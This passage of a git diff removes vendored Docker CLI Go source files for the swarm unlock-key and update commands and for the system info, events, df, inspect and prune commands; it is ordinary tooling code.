error { - client := dockerCli.Client() - ctx := context.Background() - - if rotate { - flags := swarm.UpdateFlags{RotateManagerUnlockKey: true} - - swarm, err := client.SwarmInspect(ctx) - if err != nil { - return err - } - - if !swarm.Spec.EncryptionConfig.AutoLockManagers { - return errors.New("cannot rotate because autolock is not turned on") - } - - err = client.SwarmUpdate(ctx, swarm.Version, swarm.Spec, flags) - if err != nil { - return err - } - if !quiet { - fmt.Fprintf(dockerCli.Out(), "Successfully rotated manager unlock key.\n\n") - } - } - - unlockKeyResp, err := client.SwarmGetUnlockKey(ctx) - if err != nil { - return errors.Wrap(err, "could not fetch unlock key") - } - - if unlockKeyResp.UnlockKey == "" { - return errors.New("no unlock key is set") - } - - if quiet { - fmt.Fprintln(dockerCli.Out(), unlockKeyResp.UnlockKey) - } else { - printUnlockCommand(ctx, dockerCli, unlockKeyResp.UnlockKey) - } - return nil - }, - } - - flags := cmd.Flags() - flags.BoolVar(&rotate, flagRotate, false, "Rotate unlock key") - flags.BoolVarP(&quiet, flagQuiet, "q", false, "Only display token") - - return cmd -} - -func printUnlockCommand(ctx context.Context, dockerCli *command.DockerCli, unlockKey string) { - if len(unlockKey) == 0 { - return - } - - fmt.Fprintf(dockerCli.Out(), "To unlock a swarm manager after it restarts, run the `docker swarm unlock`\ncommand and provide the following key:\n\n %s\n\nPlease remember to store this key in a password manager, since without it you\nwill not be able to restart the manager.\n", unlockKey) - return -} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/update.go b/vendor/github.com/docker/docker/cli/command/swarm/update.go deleted file mode 100644 index dbbd268725..0000000000 --- a/vendor/github.com/docker/docker/cli/command/swarm/update.go +++ /dev/null @@ -1,72 +0,0 @@ -package swarm - -import ( - "fmt" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/pkg/errors" - "github.com/spf13/cobra" - "github.com/spf13/pflag" -) - -func newUpdateCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := swarmOptions{} - - cmd := &cobra.Command{ - Use: "update [OPTIONS]", - Short: "Update the swarm", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - return runUpdate(dockerCli, cmd.Flags(), opts) - }, - PreRunE: func(cmd *cobra.Command, args []string) error { - if cmd.Flags().NFlag() == 0 { - return pflag.ErrHelp - } - return nil - }, - } - - cmd.Flags().BoolVar(&opts.autolock, flagAutolock, false, "Change manager autolocking setting (true|false)") - addSwarmFlags(cmd.Flags(), &opts) - return cmd -} - -func runUpdate(dockerCli *command.DockerCli, flags *pflag.FlagSet, opts swarmOptions) error { - client := dockerCli.Client() - ctx := context.Background() - - var updateFlags swarm.UpdateFlags - - swarm, err := client.SwarmInspect(ctx) - if err != nil { - return err - } - - prevAutoLock := swarm.Spec.EncryptionConfig.AutoLockManagers - - opts.mergeSwarmSpec(&swarm.Spec, flags) - - curAutoLock := swarm.Spec.EncryptionConfig.AutoLockManagers - - err = client.SwarmUpdate(ctx, swarm.Version, swarm.Spec, updateFlags) - if err != nil { - return err - } - - fmt.Fprintln(dockerCli.Out(), "Swarm updated.") - - if curAutoLock && !prevAutoLock { - unlockKeyResp, err := client.SwarmGetUnlockKey(ctx) - if err != nil { - return errors.Wrap(err, "could not fetch unlock key") - } - printUnlockCommand(ctx, dockerCli, unlockKeyResp.UnlockKey) - } - - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/system/cmd.go b/vendor/github.com/docker/docker/cli/command/system/cmd.go deleted file mode 100644 index ab3beb895a..0000000000 --- a/vendor/github.com/docker/docker/cli/command/system/cmd.go +++ /dev/null @@ -1,26 +0,0 @@ -package system - -import ( - "github.com/spf13/cobra" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" -) - -// NewSystemCommand returns a cobra command for `system` subcommands -func NewSystemCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := &cobra.Command{ - Use: "system", - Short: "Manage Docker", - Args: cli.NoArgs, - RunE: dockerCli.ShowHelp, - } - cmd.AddCommand( - NewEventsCommand(dockerCli), - NewInfoCommand(dockerCli), - NewDiskUsageCommand(dockerCli), - NewPruneCommand(dockerCli), - ) - - return cmd -} diff --git a/vendor/github.com/docker/docker/cli/command/system/df.go b/vendor/github.com/docker/docker/cli/command/system/df.go deleted file mode 100644 index 9f712484aa..0000000000 --- a/vendor/github.com/docker/docker/cli/command/system/df.go +++ /dev/null @@ -1,56 +0,0 @@ -package system - -import ( - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/formatter" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -type diskUsageOptions struct { - verbose bool -} - -// NewDiskUsageCommand creates a new cobra.Command for `docker df` -func NewDiskUsageCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts diskUsageOptions - - cmd := &cobra.Command{ - Use: "df [OPTIONS]", - Short: "Show docker disk usage", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - return runDiskUsage(dockerCli, opts) - }, - Tags: map[string]string{"version": "1.25"}, - } - - flags := cmd.Flags() - - flags.BoolVarP(&opts.verbose, "verbose", "v", false, "Show detailed information on space usage") - - return cmd -} - -func runDiskUsage(dockerCli *command.DockerCli, opts diskUsageOptions) error { - du, err := dockerCli.Client().DiskUsage(context.Background()) - if err != nil { - return err - } - - duCtx := formatter.DiskUsageContext{ - Context: formatter.Context{ - Output: dockerCli.Out(), - }, - LayersSize: du.LayersSize, - Images: du.Images, - Containers: du.Containers, - Volumes: du.Volumes, - Verbose: opts.verbose, - } - - duCtx.Write() - - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/system/events.go b/vendor/github.com/docker/docker/cli/command/system/events.go deleted file mode 100644 index 087523051a..0000000000 --- a/vendor/github.com/docker/docker/cli/command/system/events.go +++ /dev/null @@ -1,140 +0,0 @@ -package system - -import ( - "fmt" - "io" - "io/ioutil" - "sort" - "strings" - "text/template" - "time" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - eventtypes "github.com/docker/docker/api/types/events" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/opts" - "github.com/docker/docker/pkg/jsonlog" - "github.com/docker/docker/utils/templates" - "github.com/spf13/cobra" -) - -type eventsOptions struct { - since string - until string - filter opts.FilterOpt - format string -} - -// NewEventsCommand creates a new cobra.Command for `docker events` -func NewEventsCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := eventsOptions{filter: opts.NewFilterOpt()} - - cmd := &cobra.Command{ - Use: "events [OPTIONS]", - Short: "Get real time events from the server", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - return runEvents(dockerCli, &opts) - }, - } - - flags := cmd.Flags() - flags.StringVar(&opts.since, "since", "", "Show all events created since timestamp") - flags.StringVar(&opts.until, "until", "", "Stream events until this timestamp") - flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") - flags.StringVar(&opts.format, "format", "", "Format the output using the given Go template") - - return cmd -} - -func runEvents(dockerCli *command.DockerCli, opts *eventsOptions) error { - tmpl, err := makeTemplate(opts.format) - if err != nil { - return cli.StatusError{ - StatusCode: 64, - Status: "Error parsing format: " + err.Error()} - } - options := types.EventsOptions{ - Since: opts.since, - Until: opts.until, - Filters: opts.filter.Value(), - } - - ctx, cancel := context.WithCancel(context.Background()) - events, errs := dockerCli.Client().Events(ctx, options) - defer cancel() - - out := dockerCli.Out() - - for { - select { - case event := <-events: - if err := handleEvent(out, event, tmpl); err != nil { - return err - } - case err := <-errs: - if err == io.EOF { - return nil - } - return err - } - } -} - -func handleEvent(out io.Writer, event eventtypes.Message, tmpl *template.Template) error { - if tmpl == nil { - return prettyPrintEvent(out, event) - } - - return formatEvent(out, event, tmpl) -} - -func makeTemplate(format string) (*template.Template, error) { - if format == "" { - return nil, nil - } - tmpl, err := templates.Parse(format) - if err != nil { - return tmpl, err - } - // we execute the template for an empty message, so as to validate - // a bad template like "{{.badFieldString}}" - return tmpl, tmpl.Execute(ioutil.Discard, &eventtypes.Message{}) -} - -// prettyPrintEvent prints all types of event information. -// Each output includes the event type, actor id, name and action. -// Actor attributes are printed at the end if the actor has any. -func prettyPrintEvent(out io.Writer, event eventtypes.Message) error { - if event.TimeNano != 0 { - fmt.Fprintf(out, "%s ", time.Unix(0, event.TimeNano).Format(jsonlog.RFC3339NanoFixed)) - } else if event.Time != 0 { - fmt.Fprintf(out, "%s ", time.Unix(event.Time, 0).Format(jsonlog.RFC3339NanoFixed)) - } - - fmt.Fprintf(out, "%s %s %s", event.Type, event.Action, event.Actor.ID) - - if len(event.Actor.Attributes) > 0 { - var attrs []string - var keys []string - for k := range event.Actor.Attributes { - keys = append(keys, k) - } - sort.Strings(keys) - for _, k := range keys { - v := event.Actor.Attributes[k] - attrs = append(attrs, fmt.Sprintf("%s=%s", k, v)) - } - fmt.Fprintf(out, " (%s)", strings.Join(attrs, ", ")) - } - fmt.Fprint(out, "\n") - return nil -} - -func formatEvent(out io.Writer, event eventtypes.Message, tmpl *template.Template) error { - defer out.Write([]byte{'\n'}) - return tmpl.Execute(out, event) -} diff --git a/vendor/github.com/docker/docker/cli/command/system/info.go b/vendor/github.com/docker/docker/cli/command/system/info.go deleted file mode 100644 index e0b8767377..0000000000 --- a/vendor/github.com/docker/docker/cli/command/system/info.go +++ /dev/null @@ -1,334 +0,0 @@ -package system - -import ( - "fmt" - "sort" - "strings" - "time" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/pkg/ioutils" - "github.com/docker/docker/utils" - "github.com/docker/docker/utils/templates" - "github.com/docker/go-units" - "github.com/spf13/cobra" -) - -type infoOptions struct { - format string -} - -// NewInfoCommand creates a new cobra.Command for `docker info` -func NewInfoCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts infoOptions - - cmd := &cobra.Command{ - Use: "info [OPTIONS]", - Short: "Display system-wide information", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - return runInfo(dockerCli, &opts) - }, - } - - flags := cmd.Flags() - - flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") - - return cmd -} - -func runInfo(dockerCli *command.DockerCli, opts *infoOptions) error { - ctx := context.Background() - info, err := dockerCli.Client().Info(ctx) - if err != nil { - return err - } - if opts.format == "" { - return prettyPrintInfo(dockerCli, info) - } - return formatInfo(dockerCli, info, opts.format) -} - -func prettyPrintInfo(dockerCli *command.DockerCli, info types.Info) error { - fmt.Fprintf(dockerCli.Out(), "Containers: %d\n", info.Containers) - fmt.Fprintf(dockerCli.Out(), " Running: %d\n", info.ContainersRunning) - fmt.Fprintf(dockerCli.Out(), " Paused: %d\n", info.ContainersPaused) - fmt.Fprintf(dockerCli.Out(), " Stopped: %d\n", info.ContainersStopped) - fmt.Fprintf(dockerCli.Out(), "Images: %d\n", info.Images) - ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Server Version: %s\n", info.ServerVersion) - ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Storage Driver: %s\n", info.Driver) - if info.DriverStatus != nil { - for _, pair := range info.DriverStatus { - fmt.Fprintf(dockerCli.Out(), " %s: %s\n", pair[0], pair[1]) - - // print a warning if devicemapper is using a loopback file - if pair[0] == "Data loop file" { - fmt.Fprintln(dockerCli.Err(), " WARNING: Usage of loopback devices is strongly discouraged for production use. Use `--storage-opt dm.thinpooldev` to specify a custom block storage device.") - } - } - - } - if info.SystemStatus != nil { - for _, pair := range info.SystemStatus { - fmt.Fprintf(dockerCli.Out(), "%s: %s\n", pair[0], pair[1]) - } - } - ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Logging Driver: %s\n", info.LoggingDriver) - ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Cgroup Driver: %s\n", info.CgroupDriver) - - fmt.Fprintf(dockerCli.Out(), "Plugins: \n") - fmt.Fprintf(dockerCli.Out(), " Volume:") - fmt.Fprintf(dockerCli.Out(), " %s", strings.Join(info.Plugins.Volume, " ")) - fmt.Fprintf(dockerCli.Out(), "\n") - fmt.Fprintf(dockerCli.Out(), " Network:") - fmt.Fprintf(dockerCli.Out(), " %s", strings.Join(info.Plugins.Network, " ")) - fmt.Fprintf(dockerCli.Out(), "\n") - - if len(info.Plugins.Authorization) != 0 { - fmt.Fprintf(dockerCli.Out(), " Authorization:") - fmt.Fprintf(dockerCli.Out(), " %s", strings.Join(info.Plugins.Authorization, " ")) - fmt.Fprintf(dockerCli.Out(), "\n") - } - - fmt.Fprintf(dockerCli.Out(), "Swarm: %v\n", info.Swarm.LocalNodeState) - if info.Swarm.LocalNodeState != swarm.LocalNodeStateInactive && info.Swarm.LocalNodeState != swarm.LocalNodeStateLocked { - fmt.Fprintf(dockerCli.Out(), " NodeID: %s\n", info.Swarm.NodeID) - if info.Swarm.Error != "" { - fmt.Fprintf(dockerCli.Out(), " Error: %v\n", info.Swarm.Error) - } - fmt.Fprintf(dockerCli.Out(), " Is Manager: %v\n", info.Swarm.ControlAvailable) - if info.Swarm.ControlAvailable { - fmt.Fprintf(dockerCli.Out(), " ClusterID: %s\n", info.Swarm.Cluster.ID) - fmt.Fprintf(dockerCli.Out(), " Managers: %d\n", info.Swarm.Managers) - fmt.Fprintf(dockerCli.Out(), " Nodes: %d\n", info.Swarm.Nodes) - fmt.Fprintf(dockerCli.Out(), " Orchestration:\n") - taskHistoryRetentionLimit := int64(0) - if info.Swarm.Cluster.Spec.Orchestration.TaskHistoryRetentionLimit != nil { - taskHistoryRetentionLimit = *info.Swarm.Cluster.Spec.Orchestration.TaskHistoryRetentionLimit - } - fmt.Fprintf(dockerCli.Out(), " Task History Retention Limit: %d\n", taskHistoryRetentionLimit) - fmt.Fprintf(dockerCli.Out(), " Raft:\n") - fmt.Fprintf(dockerCli.Out(), " Snapshot Interval: %d\n", info.Swarm.Cluster.Spec.Raft.SnapshotInterval) - if info.Swarm.Cluster.Spec.Raft.KeepOldSnapshots != nil { - fmt.Fprintf(dockerCli.Out(), " Number of Old Snapshots to Retain: %d\n", *info.Swarm.Cluster.Spec.Raft.KeepOldSnapshots) - } - fmt.Fprintf(dockerCli.Out(), " Heartbeat Tick: %d\n", info.Swarm.Cluster.Spec.Raft.HeartbeatTick) - fmt.Fprintf(dockerCli.Out(), " Election Tick: %d\n", info.Swarm.Cluster.Spec.Raft.ElectionTick) - fmt.Fprintf(dockerCli.Out(), " Dispatcher:\n") - fmt.Fprintf(dockerCli.Out(), " Heartbeat Period: %s\n", units.HumanDuration(time.Duration(info.Swarm.Cluster.Spec.Dispatcher.HeartbeatPeriod))) - fmt.Fprintf(dockerCli.Out(), " CA Configuration:\n") - fmt.Fprintf(dockerCli.Out(), " Expiry Duration: %s\n", units.HumanDuration(info.Swarm.Cluster.Spec.CAConfig.NodeCertExpiry)) - if len(info.Swarm.Cluster.Spec.CAConfig.ExternalCAs) > 0 { - fmt.Fprintf(dockerCli.Out(), " External CAs:\n") - for _, entry := range info.Swarm.Cluster.Spec.CAConfig.ExternalCAs { - fmt.Fprintf(dockerCli.Out(), " %s: %s\n", entry.Protocol, entry.URL) - } - } - } - fmt.Fprintf(dockerCli.Out(), " Node Address: %s\n", info.Swarm.NodeAddr) - managers := []string{} - for _, entry := range info.Swarm.RemoteManagers { - managers = append(managers, entry.Addr) - } - if len(managers) > 0 { - sort.Strings(managers) - fmt.Fprintf(dockerCli.Out(), " Manager Addresses:\n") - for _, entry := range managers { - fmt.Fprintf(dockerCli.Out(), " %s\n", entry) - } - } - } - - if len(info.Runtimes) > 0 { - fmt.Fprintf(dockerCli.Out(), "Runtimes:") - for name := range info.Runtimes { - fmt.Fprintf(dockerCli.Out(), " %s", name) - } - fmt.Fprint(dockerCli.Out(), "\n") - fmt.Fprintf(dockerCli.Out(), "Default Runtime: %s\n", info.DefaultRuntime) - } - - if info.OSType == "linux" { - fmt.Fprintf(dockerCli.Out(), "Init Binary: %v\n", info.InitBinary) - - for _, ci := range []struct { - Name string - Commit types.Commit - }{ - {"containerd", info.ContainerdCommit}, - {"runc", info.RuncCommit}, - {"init", info.InitCommit}, - } { - fmt.Fprintf(dockerCli.Out(), "%s version: %s", ci.Name, ci.Commit.ID) - if ci.Commit.ID != ci.Commit.Expected { - fmt.Fprintf(dockerCli.Out(), " (expected: %s)", ci.Commit.Expected) - } - fmt.Fprintf(dockerCli.Out(), "\n") - } - if len(info.SecurityOptions) != 0 { - kvs, err := types.DecodeSecurityOptions(info.SecurityOptions) - if err != nil { - return err - } - fmt.Fprintf(dockerCli.Out(), "Security Options:\n") - for _, so := range kvs { - fmt.Fprintf(dockerCli.Out(), " %s\n", so.Name) - for _, o := range so.Options { - switch o.Key { - case "profile": - if o.Value != "default" { - fmt.Fprintf(dockerCli.Err(), " WARNING: You're not using the default seccomp profile\n") - } - fmt.Fprintf(dockerCli.Out(), " Profile: %s\n", o.Value) - } - } - } - } - } - - // Isolation only has meaning on a Windows daemon. - if info.OSType == "windows" { - fmt.Fprintf(dockerCli.Out(), "Default Isolation: %v\n", info.Isolation) - } - - ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Kernel Version: %s\n", info.KernelVersion) - ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Operating System: %s\n", info.OperatingSystem) - ioutils.FprintfIfNotEmpty(dockerCli.Out(), "OSType: %s\n", info.OSType) - ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Architecture: %s\n", info.Architecture) - fmt.Fprintf(dockerCli.Out(), "CPUs: %d\n", info.NCPU) - fmt.Fprintf(dockerCli.Out(), "Total Memory: %s\n", units.BytesSize(float64(info.MemTotal))) - ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Name: %s\n", info.Name) - ioutils.FprintfIfNotEmpty(dockerCli.Out(), "ID: %s\n", info.ID) - fmt.Fprintf(dockerCli.Out(), "Docker Root Dir: %s\n", info.DockerRootDir) - fmt.Fprintf(dockerCli.Out(), "Debug Mode (client): %v\n", utils.IsDebugEnabled()) - fmt.Fprintf(dockerCli.Out(), "Debug Mode (server): %v\n", info.Debug) - - if info.Debug { - fmt.Fprintf(dockerCli.Out(), " File Descriptors: %d\n", info.NFd) - fmt.Fprintf(dockerCli.Out(), " Goroutines: %d\n", info.NGoroutines) - fmt.Fprintf(dockerCli.Out(), " System Time: %s\n", info.SystemTime) - fmt.Fprintf(dockerCli.Out(), " EventsListeners: %d\n", info.NEventsListener) - } - - ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Http Proxy: %s\n", info.HTTPProxy) - ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Https Proxy: %s\n", info.HTTPSProxy) - ioutils.FprintfIfNotEmpty(dockerCli.Out(), "No Proxy: %s\n", info.NoProxy) - - if info.IndexServerAddress != "" { - u := dockerCli.ConfigFile().AuthConfigs[info.IndexServerAddress].Username - if len(u) > 0 { - fmt.Fprintf(dockerCli.Out(), "Username: %v\n", u) - } - fmt.Fprintf(dockerCli.Out(), "Registry: %v\n", info.IndexServerAddress) - } - - // Only output these warnings if the server does not support these features - if info.OSType != "windows" { - if !info.MemoryLimit { - fmt.Fprintln(dockerCli.Err(), "WARNING: No memory limit support") - } - if !info.SwapLimit { - fmt.Fprintln(dockerCli.Err(), "WARNING: No swap limit support") - } - if !info.KernelMemory { - fmt.Fprintln(dockerCli.Err(), "WARNING: No kernel memory limit support") - } - if !info.OomKillDisable { - fmt.Fprintln(dockerCli.Err(), "WARNING: No oom kill disable support") - } - if !info.CPUCfsQuota { - fmt.Fprintln(dockerCli.Err(), "WARNING: No cpu cfs quota support") - } - if !info.CPUCfsPeriod { - fmt.Fprintln(dockerCli.Err(), "WARNING: No cpu cfs period support") - } - if !info.CPUShares { - fmt.Fprintln(dockerCli.Err(), "WARNING: No cpu shares support") - } - if !info.CPUSet { - fmt.Fprintln(dockerCli.Err(), "WARNING: No cpuset support") - } - if !info.IPv4Forwarding { - fmt.Fprintln(dockerCli.Err(), "WARNING: IPv4 forwarding is disabled") - } - if !info.BridgeNfIptables { - fmt.Fprintln(dockerCli.Err(), "WARNING: bridge-nf-call-iptables is disabled") - } - if !info.BridgeNfIP6tables { - fmt.Fprintln(dockerCli.Err(), "WARNING: bridge-nf-call-ip6tables is disabled") - } - } - - if info.Labels != nil { - fmt.Fprintln(dockerCli.Out(), "Labels:") - for _, attribute := range info.Labels { - fmt.Fprintf(dockerCli.Out(), " %s\n", attribute) - } - // TODO: Engine labels with duplicate keys has been deprecated in 1.13 and will be error out - // after 3 release cycles (1.16). For now, a WARNING will be generated. The following will - // be removed eventually. - labelMap := map[string]string{} - for _, label := range info.Labels { - stringSlice := strings.SplitN(label, "=", 2) - if len(stringSlice) > 1 { - // If there is a conflict we will throw out an warning - if v, ok := labelMap[stringSlice[0]]; ok && v != stringSlice[1] { - fmt.Fprintln(dockerCli.Err(), "WARNING: labels with duplicate keys and conflicting values have been deprecated") - break - } - labelMap[stringSlice[0]] = stringSlice[1] - } - } - } - - fmt.Fprintf(dockerCli.Out(), "Experimental: %v\n", info.ExperimentalBuild) - if info.ClusterStore != "" { - fmt.Fprintf(dockerCli.Out(), "Cluster Store: %s\n", info.ClusterStore) - } - - if info.ClusterAdvertise != "" { - fmt.Fprintf(dockerCli.Out(), "Cluster Advertise: %s\n", info.ClusterAdvertise) - } - - if info.RegistryConfig != nil && (len(info.RegistryConfig.InsecureRegistryCIDRs) > 0 || len(info.RegistryConfig.IndexConfigs) > 0) { - fmt.Fprintln(dockerCli.Out(), "Insecure Registries:") - for _, registry := range info.RegistryConfig.IndexConfigs { - if registry.Secure == false { - fmt.Fprintf(dockerCli.Out(), " %s\n", registry.Name) - } - } - - for _, registry := range info.RegistryConfig.InsecureRegistryCIDRs { - mask, _ := registry.Mask.Size() - fmt.Fprintf(dockerCli.Out(), " %s/%d\n", registry.IP.String(), mask) - } - } - - if info.RegistryConfig != nil && len(info.RegistryConfig.Mirrors) > 0 { - fmt.Fprintln(dockerCli.Out(), "Registry Mirrors:") - for _, mirror := range info.RegistryConfig.Mirrors { - fmt.Fprintf(dockerCli.Out(), " %s\n", mirror) - } - } - - fmt.Fprintf(dockerCli.Out(), "Live Restore Enabled: %v\n", info.LiveRestoreEnabled) - - return nil -} - -func formatInfo(dockerCli *command.DockerCli, info types.Info, format string) error { - tmpl, err := templates.Parse(format) - if err != nil { - return cli.StatusError{StatusCode: 64, - Status: "Template parsing error: " + err.Error()} - } - err = tmpl.Execute(dockerCli.Out(), info) - dockerCli.Out().Write([]byte{'\n'}) - return err -} diff --git a/vendor/github.com/docker/docker/cli/command/system/inspect.go b/vendor/github.com/docker/docker/cli/command/system/inspect.go deleted file mode 100644 index c86e858a29..0000000000 --- a/vendor/github.com/docker/docker/cli/command/system/inspect.go +++ /dev/null @@ -1,203 +0,0 @@ -package system - -import ( - "fmt" - "strings" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/inspect" - apiclient "github.com/docker/docker/client" - "github.com/spf13/cobra" -) - -type inspectOptions struct { - format string - inspectType string - size bool - ids []string -} - -// NewInspectCommand creates a new cobra.Command for `docker inspect` -func NewInspectCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts inspectOptions - - cmd := &cobra.Command{ - Use: "inspect [OPTIONS] NAME|ID [NAME|ID...]", - Short: "Return low-level information on Docker objects", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.ids = args - return runInspect(dockerCli, opts) - }, - } - - flags := cmd.Flags() - flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") - flags.StringVar(&opts.inspectType, "type", "", "Return JSON for specified type") - flags.BoolVarP(&opts.size, "size", "s", false, "Display total file sizes if the type is container") - - return cmd -} - -func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error { - var elementSearcher inspect.GetRefFunc - switch opts.inspectType { - case "", "container", "image", "node", "network", "service", "volume", "task", "plugin": - elementSearcher = inspectAll(context.Background(), dockerCli, opts.size, opts.inspectType) - default: - return fmt.Errorf("%q is not a valid value for --type", opts.inspectType) - } - return inspect.Inspect(dockerCli.Out(), opts.ids, opts.format, elementSearcher) -} - -func inspectContainers(ctx context.Context, dockerCli *command.DockerCli, getSize bool) inspect.GetRefFunc { - return func(ref string) (interface{}, []byte, error) { - return dockerCli.Client().ContainerInspectWithRaw(ctx, ref, getSize) - } -} - -func inspectImages(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc { - return func(ref string) (interface{}, []byte, error) { - return dockerCli.Client().ImageInspectWithRaw(ctx, ref) - } -} - -func inspectNetwork(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc { - return func(ref string) (interface{}, []byte, error) { - return dockerCli.Client().NetworkInspectWithRaw(ctx, ref) - } -} - -func inspectNode(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc { - return func(ref string) (interface{}, []byte, error) { - return dockerCli.Client().NodeInspectWithRaw(ctx, ref) - } -} - -func inspectService(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc { - return func(ref string) (interface{}, []byte, error) { - return dockerCli.Client().ServiceInspectWithRaw(ctx, ref) - } -} - -func inspectTasks(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc { - return func(ref string) (interface{}, []byte, error) { - return dockerCli.Client().TaskInspectWithRaw(ctx, ref) - } -} - -func inspectVolume(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc { - return func(ref string) (interface{}, []byte, error) { - return dockerCli.Client().VolumeInspectWithRaw(ctx, ref) - } -} - -func inspectPlugin(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc { - return func(ref string) (interface{}, []byte, error) { - return dockerCli.Client().PluginInspectWithRaw(ctx, ref) - } -} - -func inspectAll(ctx context.Context, dockerCli *command.DockerCli, getSize bool, typeConstraint string) inspect.GetRefFunc { - var inspectAutodetect = []struct { - objectType string - isSizeSupported bool - isSwarmObject bool - objectInspector func(string) (interface{}, []byte, error) - }{ - { - objectType: "container", - isSizeSupported: true, - objectInspector: inspectContainers(ctx, dockerCli, getSize), - }, - { - objectType: "image", - objectInspector: inspectImages(ctx, dockerCli), - }, - { - objectType: "network", - objectInspector: inspectNetwork(ctx, dockerCli), - }, - { - objectType: "volume", - objectInspector: inspectVolume(ctx, dockerCli), - }, - { - objectType: "service", - isSwarmObject: true, - objectInspector: inspectService(ctx, dockerCli), - }, - { - objectType: "task", - isSwarmObject: true, - objectInspector: inspectTasks(ctx, dockerCli), - }, - { - objectType: "node", - isSwarmObject: true, - objectInspector: inspectNode(ctx, dockerCli), - }, - { - objectType: "plugin", - objectInspector: inspectPlugin(ctx, dockerCli), - }, - } - - // isSwarmManager does an Info API call to verify that the daemon is - // a swarm manager. - isSwarmManager := func() bool { - info, err := dockerCli.Client().Info(ctx) - if err != nil { - fmt.Fprintln(dockerCli.Err(), err) - return false - } - return info.Swarm.ControlAvailable - } - - isErrNotSupported := func(err error) bool { - return strings.Contains(err.Error(), "not supported") - } - - return func(ref string) (interface{}, []byte, error) { - const ( - swarmSupportUnknown = iota - swarmSupported - swarmUnsupported - ) - - isSwarmSupported := swarmSupportUnknown - - for _, inspectData := range inspectAutodetect { - if typeConstraint != "" && inspectData.objectType != typeConstraint { - continue - } - if typeConstraint == "" && inspectData.isSwarmObject { - if isSwarmSupported == swarmSupportUnknown { - if isSwarmManager() { - isSwarmSupported = swarmSupported - } else { - isSwarmSupported = swarmUnsupported - } - } - if isSwarmSupported == swarmUnsupported { - continue - } - } - v, raw, err := inspectData.objectInspector(ref) - if err != nil { - if typeConstraint == "" && (apiclient.IsErrNotFound(err) || isErrNotSupported(err)) { - continue - } - return v, raw, err - } - if getSize && !inspectData.isSizeSupported { - fmt.Fprintf(dockerCli.Err(), "WARNING: --size ignored for %s\n", inspectData.objectType) - } - return v, raw, err - } - return nil, nil, fmt.Errorf("Error: No such object: %s", ref) - } -} diff --git a/vendor/github.com/docker/docker/cli/command/system/prune.go b/vendor/github.com/docker/docker/cli/command/system/prune.go deleted file mode 100644 index 92dddbdca6..0000000000 --- a/vendor/github.com/docker/docker/cli/command/system/prune.go +++ /dev/null @@ -1,93 +0,0 @@ -package system - -import ( - "fmt" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/prune" - units "github.com/docker/go-units" - "github.com/spf13/cobra" -) - -type pruneOptions struct { - force bool - all bool -} - -// NewPruneCommand creates a new cobra.Command for `docker prune` -func NewPruneCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts pruneOptions - - cmd := &cobra.Command{ - Use: "prune [OPTIONS]", - Short: "Remove unused data", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - return runPrune(dockerCli, opts) - }, - Tags: map[string]string{"version": "1.25"}, - } - - flags := cmd.Flags() - flags.BoolVarP(&opts.force, "force", "f", false, "Do not prompt for confirmation") - flags.BoolVarP(&opts.all, "all", "a", false, "Remove all unused images not just dangling ones") - - return cmd -} - -const ( - warning = `WARNING! This will remove: - - all stopped containers - - all volumes not used by at least one container - - all networks not used by at least one container - %s -Are you sure you want to continue?` - - danglingImageDesc = "- all dangling images" - allImageDesc = `- all images without at least one container associated to them` -) - -func runPrune(dockerCli *command.DockerCli, opts pruneOptions) error { - var message string - - if opts.all { - message = fmt.Sprintf(warning, allImageDesc) - } else { - message = fmt.Sprintf(warning, danglingImageDesc) - } - - if !opts.force && !command.PromptForConfirmation(dockerCli.In(), dockerCli.Out(), message) { - return nil - } - - var spaceReclaimed uint64 - - for _, pruneFn := range 